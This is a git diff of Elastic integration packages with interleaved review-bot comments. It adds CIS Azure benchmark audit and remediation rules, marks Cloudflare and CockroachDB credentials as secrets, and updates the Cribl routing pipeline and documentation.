https://learn.microsoft.com/en-us/powershell/module/az.sql/set-azsqlservertransparentdataencryptionprotector?view=azps-9.2.0", + "id": "f6cfd4ce-1b96-5871-aa9d-8dba2d701579", + "name": "Ensure SQL server's Transparent Data Encryption (TDE) protector is encrypted with Customer-managed key", + "profile_applicability": "* Level 2", + "description": "Transparent Data Encryption (TDE) with Customer-managed key support provides increased transparency and control over the TDE Protector, increased security with an HSM-backed external service, and promotion of separation of duties.\n\nWith TDE, data is encrypted at rest with a symmetric key (called the database encryption key) stored in the database or data warehouse distribution.\nTo protect this data encryption key (DEK) in the past, only a certificate that the Azure SQL Service managed could be used.\nNow, with Customer-managed key support for TDE, the DEK can be protected with an asymmetric key that is stored in the Azure Key Vault.\nThe Azure Key Vault is a highly available and scalable cloud-based key store which offers central key management, leverages FIPS 140-2 Level 2 validated hardware security modules (HSMs), and allows separation of management of keys and data for additional security.\n\nBased on business needs or criticality of data/databases hosted on a SQL server, it is recommended that the TDE protector is encrypted by a key that is managed by the data owner (Customer-managed key).", + "rationale": "Customer-managed key support for Transparent Data Encryption (TDE) allows user control of TDE encryption keys and restricts who can access them and when.\nAzure Key Vault, Azure\u2019s cloud-based external key management system, is the first key management service where TDE has integrated support for Customer-managed keys.\nWith Customer-managed key support, the database encryption key is protected by an asymmetric key stored in the Key Vault.\nThe asymmetric key is set at the server level and inherited by all 
databases under that server.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n\nFor the desired server instance\n\n2. Click On `Transparent data encryption`\n3. Ensure that `Customer-managed key` is selected\n4. Ensure `Make selected key the default TDE protector` is checked\n\n**From Azure CLI**\n\n```\naz account get-access-token --query \"{subscripton:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/encryptionProtector?api-version=2015-05-01-preview'\n```\n\nEnsure the output of the command contains properties\n\n`kind` set to `azurekeyvault`\n\n`serverKeyType` set to `AzureKeyVault`\n\n`uri` is not null\n\n**From PowerShell**\n\n```\nGet-AzSqlServerTransparentDataEncryptionProtector -ServerName -ResourceGroupName \n```\nEnsure the output of the command contains properties\n\n`Type` set to `AzureKeyVault`\n\n`ServerKeyVaultKeyName` set to `KeyVaultName_KeyName_KeyIdentifierVersion`\n\n`KeyId` set to `KeyIdentifier`", + "remediation": "**From Azure Console**\n\n1. Go to `SQL servers`\n\nFor the desired server instance\n\n2. Click On `Transparent data encryption`\n3. Set `Transparent data encryption` to `Customer-managed key`\n4. Browse through your `key vaults` to Select an existing key or create a new key in \nthe Azure Key Vault.\n5. 
Check `Make selected key the default TDE protector`\n\n**From Azure CLI**\n\nUse the below command to encrypt SQL server's TDE protector with a Customer-managed key\n```\naz sql server tde-key set --resource-group --server --server-key-type {AzureKeyVault} --kid \n```\n\n**From PowerShell**\n\nUse the below command to encrypt SQL server's TDE protector with a Customer-managed Key Vault key\n```\nSet-AzSqlServerTransparentDataEncryptionProtector -Type AzureKeyVault -KeyId -ServerName -ResourceGroupName \n```\nSelect `Y` when prompted", + "section": "SQL Server - Auditing", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.1.3", + "SQL Server - Auditing" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.1.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_1_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/fa9bbc09-3b1f-5344-a4a4-523a899a35b7.json b/packages/cloud_security_posture/kibana/csp_rule_template/fa9bbc09-3b1f-5344-a4a4-523a899a35b7.json new file mode 100644 index 00000000000..a278667f56e --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/fa9bbc09-3b1f-5344-a4a4-523a899a35b7.json 
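Review bot: The Azure CLI audit command in this rule's `audit` text hands the access token to curl as a positional argument (`xargs -L1 bash -c 'curl ... -H "Authorization: Bearer $1" ...'`), so the bearer token ends up in the process list and the shell history of whatever host runs the check. Since this text is surfaced to users as guidance, a short caveat after the command block would help, e.g. `Note: this command places the access token on the command line; run it from a trusted host, or use az rest, which attaches the token itself.` The command also pins `api-version=2015-05-01-preview`; that is presumably inherited from the CIS text, but it is worth confirming the preview API version still resolves before shipping it as the recommended check.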
@@ -0,0 +1,38 @@ +{ + "id": "fa9bbc09-3b1f-5344-a4a4-523a899a35b7", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Keys cannot be used beyond their assigned expiration dates respectively. Keys need to be rotated periodically wherever they are used.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-keys\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultkeyattribute?view=azps-0.10.0", + "id": "fa9bbc09-3b1f-5344-a4a4-523a899a35b7", + "name": "Ensure that the Expiration Date is set for all Keys in RBAC Key Vaults", + "profile_applicability": "* Level 1", + "description": "Ensure that all Keys in Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.", + "rationale": "Azure Key Vault enables users to store and use cryptographic keys within the Microsoft Azure environment.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the key MUST NOT be used for encryption of new data, wrapping of new keys, and signing.\nBy default, keys never expire.\nIt is thus recommended that keys be rotated in the key vault and set an explicit expiration date for all keys to help enforce the key rotation.\nThis ensures that the keys cannot be used beyond their assigned lifetimes.", + "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. 
In the main pane, ensure that an appropriate `Expiration date` is set for any keys that are `Enabled`.\n\n**From Azure CLI:**\n\nGet a list of all the key vaults in your Azure environment by running the following command:\n\n```\naz keyvault list\n```\n\nThen for each key vault listed ensure that the output of the below command contains Key ID (kid), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault key list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}'\n```\n\n**From PowerShell:**\n\nRetrieve a list of Azure Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault run the following command to determine which vaults are configured to use RBAC.\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key vault with the `EnableRbacAuthorizatoin` setting set to `True`, run the following command.\n\n```\nGet-AzKeyVaultKey -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.", + "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that an appropriate `Expiration date` is set for any keys that are `Enabled`.\n\n**From Azure CLI:**\n\nUpdate the `Expiration date` for the key using the below command:\n\n```\naz keyvault key set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\n**Note:**\nTo view the expiration date on all keys in a Key Vault using Microsoft API, the \"List\" Key permission is required.\n\nTo update the expiration date for the keys:\n4. Go to the Key vault, click on Access Control (IAM).\n5. 
Click on Add role assignment and assign the role of Key Vault Crypto Officer to the appropriate user.\n\n**From PowerShell:**\n\n```\nSet-AzKeyVaultKeyAttribute -VaultName -Name -Expires \n```", + "section": "Key Vault", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 8.1", + "Key Vault" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "8.1", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_8_1" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/manifest.yml b/packages/cloud_security_posture/manifest.yml index 443ff0e4956..e2368444985 100644 --- a/packages/cloud_security_posture/manifest.yml +++ b/packages/cloud_security_posture/manifest.yml @@ -1,18 +1,17 @@ format_version: 3.0.0 name: cloud_security_posture title: "Security Posture Management" -version: "1.8.0-preview05" +version: "1.9.0-preview03" source: license: "Elastic-2.0" description: "Identify & remediate configuration risks in your Cloud infrastructure" type: integration categories: - - aws - - kubernetes - security + - cloudsecurity_cdr conditions: kibana: - version: "^8.13.0" + version: "^8.14.0" elastic: subscription: basic capabilities: 
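Review bot: The PowerShell audit text in this rule misspells the vault property as `EnableRbacAuthorizatoin` (`For each Key vault with the EnableRbacAuthorizatoin setting set to True`), so a user who searches the `Get-AzKeyVault` output for that name will not find it; it should read `EnableRbacAuthorization`, the spelling the sibling 8.4 template uses. Reference 4 links `set-azkeyvaultkeyattribute?view=azps-0.10.0`, a very old module version that may redirect or go stale; the current page would be the safer link. Both are one-word edits inside the `audit` and `references` string values.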
@@ -116,7 +115,7 @@ policy_templates: show_user: false description: Template URL to Cloud Formation Quick Create Stack # ACCOUNT_TYPE value should be either "single-account" or "organization-account" - default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cspm-ACCOUNT_TYPE-8.12.0.yml&stackName=Elastic-Cloud-Security-Posture-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent + default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cspm-ACCOUNT_TYPE-8.13.0.yml&stackName=Elastic-Cloud-Security-Posture-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent - type: cloudbeat/cis_gcp title: GCP description: CIS Benchmark for Google Cloud Platform Foundations @@ -128,7 +127,7 @@ policy_templates: required: true show_user: false description: A URL to CloudShell for creating a new deployment - default: https://shell.cloud.google.com/cloudshell/?ephemeral=true&cloudshell_git_repo=https%3A%2F%2Fgithub.com%2Felastic%2Fcloudbeat&cloudshell_git_branch=8.12&cloudshell_workspace=deploy%2Fdeployment-manager&show=terminal + default: https://shell.cloud.google.com/cloudshell/?ephemeral=true&cloudshell_git_repo=https%3A%2F%2Fgithub.com%2Felastic%2Fcloudbeat&cloudshell_git_branch=8.13&cloudshell_workspace=deploy%2Fdeployment-manager&show=terminal - type: cloudbeat/cis_azure title: Azure description: CIS Benchmark for Microsoft Azure Foundations 
@@ -141,7 +140,7 @@ policy_templates: show_user: false description: A URL to the ARM Template for creating a new deployment # ACCOUNT_TYPE value should be either "single-account" or "organization-account" - default: https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Felastic%2Fcloudbeat%2F8.12%2Fdeploy%2Fazure%2FARM-for-ACCOUNT_TYPE.json + default: https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Felastic%2Fcloudbeat%2F8.13%2Fdeploy%2Fazure%2FARM-for-ACCOUNT_TYPE.json - name: vuln_mgmt title: Cloud Native Vulnerability Management (CNVM) description: Scan for cloud workload vulnerabilities @@ -177,7 +176,7 @@ policy_templates: required: true show_user: false description: Template URL to Cloud Formation Quick Create Stack - default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cnvm-8.12.0.yml&stackName=Elastic-Vulnerability-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent + default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cnvm-8.13.0.yml&stackName=Elastic-Vulnerability-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent owner: github: elastic/cloud-security-posture type: elastic diff --git a/packages/cloudflare/changelog.yml b/packages/cloudflare/changelog.yml index b40585d6cc7..ff28f5b7ecf 100644 --- a/packages/cloudflare/changelog.yml +++ b/packages/cloudflare/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "2.23.1" changes: - description: Changed owners diff --git a/packages/cloudflare/data_stream/audit/manifest.yml b/packages/cloudflare/data_stream/audit/manifest.yml index a8ac79b5d69..fcc2d38c84a 100644 --- a/packages/cloudflare/data_stream/audit/manifest.yml +++ b/packages/cloudflare/data_stream/audit/manifest.yml @@ -17,6 +17,7 @@ streams: multi: false required: true show_user: true + secret: true - name: account type: text title: Account ID diff --git a/packages/cloudflare/data_stream/logpull/manifest.yml b/packages/cloudflare/data_stream/logpull/manifest.yml index b437a086783..087f05751c4 100644 --- a/packages/cloudflare/data_stream/logpull/manifest.yml +++ b/packages/cloudflare/data_stream/logpull/manifest.yml @@ -17,6 +17,7 @@ streams: multi: false required: false show_user: true + secret: true - name: auth_token type: password title: Auth token @@ -24,6 +25,7 @@ streams: required: false multi: false show_user: true + secret: true - name: zone_id type: text title: Zone ID diff --git a/packages/cloudflare/manifest.yml b/packages/cloudflare/manifest.yml index 0d00c3e1aa6..5e5caeeabb0 100644 --- a/packages/cloudflare/manifest.yml +++ b/packages/cloudflare/manifest.yml @@ -1,13 +1,13 @@ name: cloudflare title: Cloudflare -version: "2.23.1" +version: "2.24.0" description: Collect logs from Cloudflare with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, network, cdn_security] conditions: kibana: - version: ^8.10.1 + version: ^8.12.0 icons: - src: /img/cf-logo-v.svg title: Cloudflare diff --git a/packages/cloudflare_logpush/changelog.yml b/packages/cloudflare_logpush/changelog.yml index 4b4fbc90337..ecd6d43be73 100644 --- a/packages/cloudflare_logpush/changelog.yml 
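Review bot: The kibana constraint is raised to `^8.12.0` to accompany the new `secret: true` flags in the audit and logpull streams, but the cockroachdb changelog elsewhere in this diff records that secrets had to be disabled on older stacks "due to errors" and were only re-enabled together with a `^8.12.1` constraint, so `^8.12.0` may still admit a Kibana release on which these vars fail. If the problem worked around there is specific to 8.12.0, `version: ^8.12.1` would be the consistent constraint here; otherwise a changelog sentence saying why 8.12.0 suffices would head off the question. This is inferred from the sibling package's changelog, not from anything Cloudflare-specific.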
+++ b/packages/cloudflare_logpush/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.17.4" changes: - description: Changed owners diff --git a/packages/cloudflare_logpush/manifest.yml b/packages/cloudflare_logpush/manifest.yml index 36935e27b79..d808da82f4c 100644 --- a/packages/cloudflare_logpush/manifest.yml +++ b/packages/cloudflare_logpush/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cloudflare_logpush title: Cloudflare Logpush -version: "1.17.4" +version: "1.18.0" description: Collect and parse logs from Cloudflare API with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ categories: - cdn_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/cloudflare_logpush-overview1.png title: Cloudflare Logpush - Zero Trust Overview @@ -60,12 +60,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true - name: ssl type: yaml title: SSL Configuration @@ -137,6 +139,7 @@ policy_templates: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -144,13 +147,15 @@ policy_templates: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File 
@@ -222,6 +227,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: "JSON Credentials file path" diff --git a/packages/cockroachdb/changelog.yml b/packages/cockroachdb/changelog.yml index dd7b377e5dc..56e878dbebf 100644 --- a/packages/cockroachdb/changelog.yml +++ b/packages/cockroachdb/changelog.yml @@ -1,3 +1,18 @@ +- version: "1.9.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.8.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.8.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.7.1" changes: - description: Add dimension field for container.id which was previously missed during package-spec v3 migration diff --git a/packages/cockroachdb/data_stream/status/manifest.yml b/packages/cockroachdb/data_stream/status/manifest.yml index eaae20c3e71..b3aa554c9c4 100644 --- a/packages/cockroachdb/data_stream/status/manifest.yml +++ b/packages/cockroachdb/data_stream/status/manifest.yml @@ -21,6 +21,7 @@ streams: - name: bearer_token_file type: text title: Bearer Token File + secret: false multi: false required: false show_user: true @@ -53,6 +54,7 @@ streams: - name: password type: password title: Password + secret: true multi: false required: false show_user: true diff --git a/packages/cockroachdb/manifest.yml b/packages/cockroachdb/manifest.yml index a1e148f9555..a6860eba91b 100644 --- a/packages/cockroachdb/manifest.yml +++ b/packages/cockroachdb/manifest.yml 
@@ -1,6 +1,6 @@ name: cockroachdb title: CockroachDB Metrics -version: "1.7.1" +version: "1.9.0" description: Collect metrics from CockroachDB servers with Elastic Agent. type: integration icons: @@ -13,13 +13,13 @@ screenshots: title: CockroachDB metrics overview size: 5120x2562 type: image/png -format_version: "3.0.0" +format_version: "3.0.2" categories: - observability - datastore conditions: kibana: - version: "^8.9.0" + version: "^8.12.1" elastic: subscription: basic vars: diff --git a/packages/cribl/_dev/build/docs/README.md b/packages/cribl/_dev/build/docs/README.md new file mode 100644 index 00000000000..8963da8fddf --- /dev/null +++ b/packages/cribl/_dev/build/docs/README.md 
@@ -0,0 +1,43 @@ +# Cribl + +The Cribl integration offers users a way to ingest logs from either of Cribl's Elastic outputs into Elastic's Fleet integration data streams. This enables Cribl users to leverage the power of the Elastic Common Schema to unlock predefined dashboards, alerts and more. + +## Instructions + +1. Install the relevant integration assets in Kibana + + In order to make the most of your data, install Fleet integration assets to load index templates, ingest pipelines, and dashboards into Kibana. In Kibana, navigate to **Management** > **Integrations** in the sidebar. + + Find the relevant integration(s) by searching or browsing the catalog. For example, the Cisco ASA integration. + + ![Cisco ASA Integration](../img/catalog-cisco-asa.png) + + Navigate to the **Settings** tab and click **Install Cisco ASA assets**. Confirm by clicking **Install Cisco ASA** in the popup. + + ![Install Cisco ASA assets](../img/install-assets.png) + +2. Configuring the Cribl integration + + 1. Add informational field to Cribl Source + + Configure the Cribl Source to specify the source of the data in the `_dataId` field. + + ![Configure Cribl Source fields](../img/cribl-source-fields.png) + + See [Cribl Data Onboarding](https://docs.cribl.io/stream/data-onboarding/) for more information on configuring sources. + + 2. Configure the Cribl integration in Kibana + + Note: The Cribl integration does not require Elastic Agent, but a policy must be configured when setting up the Cribl integration. + +4. Configure an Elastic destination in Cribl + + Cribl offers two options for sending data to Elastic, the Elastic Cloud output for cloud environments, and the Elasticsearch output for self-managed. Consult [Cribl Elastic Cloud documentation](https://docs.cribl.io/stream/destinations-elastic-cloud/) or [Cribl Elasticsearch documentation](https://docs.cribl.io/stream/destinations-elastic/) for more details on how to configure. + + **Destination settings** + + 1. 
Set **Cloud Id** for the Cloud destination or **Bulk API URLs** for the Elasticsearch destination to point to your Elastic cluster. + + 2. Set **Index or Data Stream** to `logs-cribl-default`. + + 3. **API key** should be a Base64 encoded Elastic API key, which you can create in Kibana by following the instructions under **Management** > **Stack Management** > **Security** > **API Keys**. If you are using an API key with “Restrict privileges”, be sure to review the Indices privileges to provide at least "auto_configure" and "write" permissions for the logs-* index, which you will be using for these Fleet integration data streams. \ No newline at end of file diff --git a/packages/cribl/changelog.yml b/packages/cribl/changelog.yml index 416bf37c8a8..cb5384708cb 100644 --- a/packages/cribl/changelog.yml +++ b/packages/cribl/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "0.3.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 +- version: "0.2.0" + changes: + - description: Adds the second phase of the Cribl package + type: enhancement + link: https://github.com/elastic/integrations/pull/9097 - version: "0.1.2" changes: - description: Changed owners diff --git a/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml b/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml index 325790fbe1b..c1b465abebf 100644 --- a/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml 
@@ -3,12 +3,20 @@ description: Pipeline for rerouting log streams from Cribl. processors: - set: field: ecs.version - value: 8.11.0 + value: 8.13.0 - append: field: tags value: - cribl allow_duplicates: false + - rename: + field: _raw + target_field: message + ignore_missing: true + # The Cribl routing pipeline is managed by Kibana + # https://github.com/elastic/kibana/pull/176439 + - pipeline: + name: 'cribl-routing-pipeline' on_failure: - set: field: error.message diff --git a/packages/cribl/docs/README.md b/packages/cribl/docs/README.md index cefca6efbdf..8963da8fddf 100644 --- a/packages/cribl/docs/README.md +++ b/packages/cribl/docs/README.md @@ -16,17 +16,9 @@ The Cribl integration offers users a way to ingest logs from either of Cribl's E ![Install Cisco ASA assets](../img/install-assets.png) -2. Update reroute rule logic +2. Configuring the Cribl integration - In order to specify the routing logic to be able to direct your events from Cribl to an Elastic integration datastream, setup a custom ingest pipeline for the Cribl integration. - - 1. Identify the name of the Elastic dataset - - Review the relevant [integration documentation](https://docs.elastic.co/integrations) to determine the correct es_datastream_name value. The data stream components can be found in the example event for each integration. - - ![Cisco ASA sample event documentation](../img/sample-event-dataset-name.png) - - 2. Add informational field to Cribl Source + 1. Add informational field to Cribl Source Configure the Cribl Source to specify the source of the data in the `_dataId` field. 
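Review bot: The new `pipeline` processor invokes `cribl-routing-pipeline` with no `ignore_missing_pipeline`, so until Kibana has created that pipeline (the comment says Kibana manages it, and the README in this change says a policy must be configured first) every event fails into `on_failure` and is indexed in `logs-cribl-default` with `error.message` set rather than being routed. If that is intended, the comment should say so, e.g. `# Until Kibana creates this pipeline (when a Cribl policy is configured) events fail into on_failure and land in logs-cribl-default with error.message set`; if not, `ignore_missing_pipeline: true` would let such events index as plain Cribl logs instead. The `_raw` → `message` rename uses `ignore_missing: true`, so events carrying no `_raw` reach the routing pipeline without a `message`; presumably Cribl sources always set it, but a word on that in the comment would help.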
@@ -34,35 +26,18 @@ The Cribl integration offers users a way to ingest logs from either of Cribl's E See [Cribl Data Onboarding](https://docs.cribl.io/stream/data-onboarding/) for more information on configuring sources. - 3. Create custom pipeline - - In Kibana, navigate to **Management** > **Stack Management** in the side bar. Under the **Ingest** header, select **Ingest Pipelines**. Click **Create pipeline** > **New pipeline**. - - **Custom pipeline configuration** - 1. The pipeline **Name** must be `logs-cribl@custom`. - - 2. **Add a processor** + 2. Configure the Cribl integration in Kibana - 1. Set the **Dataset** to the value identified in the step above (`cisco_asa.log` for our example). + Note: The Cribl integration does not require Elastic Agent, but a policy must be configured when setting up the Cribl integration. - 2. Set the **Namespace** to `default`. +4. Configure an Elastic destination in Cribl - 3. Fill in the conditional to specify the Cribl `_dataId` source field. - - ![Reroute processor](../img/custom-pipeline-reroute-processor.png) - -3. Configure an Elastic destination in Cribl - - Cribl offers two options for sending data to Elastic, the Elastic Cloud ouput for cloud environments, and the Elasticsearch output for self-managed. Consult the or the [Cribl Elastic Cloud documentation](https://docs.cribl.io/stream/destinations-elastic-cloud/) or [Cribl Elasticsearch documentation](https://docs.cribl.io/stream/destinations-elastic/) for more details on how to configure. + Cribl offers two options for sending data to Elastic, the Elastic Cloud output for cloud environments, and the Elasticsearch output for self-managed. Consult [Cribl Elastic Cloud documentation](https://docs.cribl.io/stream/destinations-elastic-cloud/) or [Cribl Elasticsearch documentation](https://docs.cribl.io/stream/destinations-elastic/) for more details on how to configure. **Destination settings** - 1. 
Set **Cloud Id** for the Cloud destination or **Bulk API URLs** for the Elasticaearch destination to point to your Elastic cluster. + 1. Set **Cloud Id** for the Cloud destination or **Bulk API URLs** for the Elasticsearch destination to point to your Elastic cluster. 2. Set **Index or Data Stream** to `logs-cribl-default`. - 3. **API key** should be a Base64 encoded Elastic API key, which can be created in Kibana by following the instructions under API Keys. If you are using an API key with “Restrict privileges”, be sure to review the Indices privileges to provide at least "auto_configure" & "write" permissions for the logs-* index, which you will be using for these Fleet integration data streams. - - - - \ No newline at end of file + 3. **API key** should be a Base64 encoded Elastic API key, which you can create in Kibana by following the instructions under **Management** > **Stack Management** > **Security** > **API Keys**. If you are using an API key with “Restrict privileges”, be sure to review the Indices privileges to provide at least "auto_configure" and "write" permissions for the logs-* index, which you will be using for these Fleet integration data streams. \ No newline at end of file diff --git a/packages/cribl/img/custom-pipeline-reroute-processor.png b/packages/cribl/img/custom-pipeline-reroute-processor.png deleted file mode 100644 index 92884cfc2d1..00000000000 Binary files a/packages/cribl/img/custom-pipeline-reroute-processor.png and /dev/null differ diff --git a/packages/cribl/img/sample-event-dataset-name.png b/packages/cribl/img/sample-event-dataset-name.png deleted file mode 100644 index 77ed44f8afb..00000000000 Binary files a/packages/cribl/img/sample-event-dataset-name.png and /dev/null differ diff --git a/packages/cribl/manifest.yml b/packages/cribl/manifest.yml index b54b5369413..66cb85b6031 100644 --- a/packages/cribl/manifest.yml +++ b/packages/cribl/manifest.yml 
@@ -1,19 +1,26 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: cribl title: "Cribl" -version: 0.1.2 +version: 0.3.0 description: Stream logs from Cribl into Elastic. type: integration categories: - custom conditions: kibana: - version: "^8.8.0" + version: "^8.13.0" icons: - src: /img/logo.svg title: Cribl logo size: 32x32 type: image/svg+xml +vars: + - name: route_entries + type: textarea + title: Route mappings from Cribl sources to Elastic datastreams + multi: false + required: true + show_user: false owner: github: elastic/security-service-integrations type: elastic diff --git a/packages/crowdstrike/_dev/build/build.yml b/packages/crowdstrike/_dev/build/build.yml index 2bfcfc223b0..71f48ba2a9c 100644 --- a/packages/crowdstrike/_dev/build/build.yml +++ b/packages/crowdstrike/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/crowdstrike/_dev/build/docs/README.md b/packages/crowdstrike/_dev/build/docs/README.md index aa4f3649bb8..119d20db175 100644 --- a/packages/crowdstrike/_dev/build/docs/README.md +++ b/packages/crowdstrike/_dev/build/docs/README.md 
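Review bot: The new `route_entries` var has no `description`, yet it is `required: true` with `show_user: false`, so it sits under the advanced options with nothing telling the user what to enter, and the policy presumably cannot be saved until they find and fill it. A `description:` line is the minimum, e.g. `description: Mappings from Cribl source identifiers (the _dataId field) to the Elastic data stream each should be routed to.` — adjust the wording to the format the Kibana routing pipeline actually expects, which is not visible here. Since this var decides where incoming events are written, `show_user: true` would also be reasonable so it is not hidden from the person configuring the policy.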
@@ -1,17 +1,54 @@ # CrowdStrike Integration -This integration is for [CrowdStrike](https://www.crowdstrike.com/resources/?cs_query=type=5) products. It includes the -following datasets for receiving logs: +The [CrowdStrike](https://www.crowdstrike.com/) Falcon integration allows you to easily connect your CrowdStrike Falcon platform to Elastic for seamless onboarding of alerts and telemetry from CrowdStrike Falcon and Falcon Data Replicator. Elastic Security can leverage this data for security analytics including correlation, visualization and incident response. It provides support using three different modes for integrating CrowdStrike to the Elastic: + +1. Falcon SIEM Connector: This is a pre-built integration designed to connect CrowdStrike Falcon with Security Information and Event Management (SIEM) systems. It streamlines the flow of security data from CrowdStrike Falcon to the SIEM, providing a standardized and structured way of feeding information into the SIEM platform. It includes the following datasets for receiving logs: - `falcon` dataset: consists of endpoint data and Falcon platform audit data forwarded from [Falcon SIEM Connector](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem/). + +2. CrowdStrike REST API: This provides a programmatic interface to interact with the CrowdStrike Falcon platform. It allows users to perform various operations such as querying information about unified alerts and hosts/devices. It includes the following datasets for receiving logs: + +- `alert` dataset: It is typically used to retrieve detailed information about unified alerts generated by the CrowdStrike Falcon platform, via Falcon Intelligence Alert API - `/alerts/entities/alerts/v2`. 
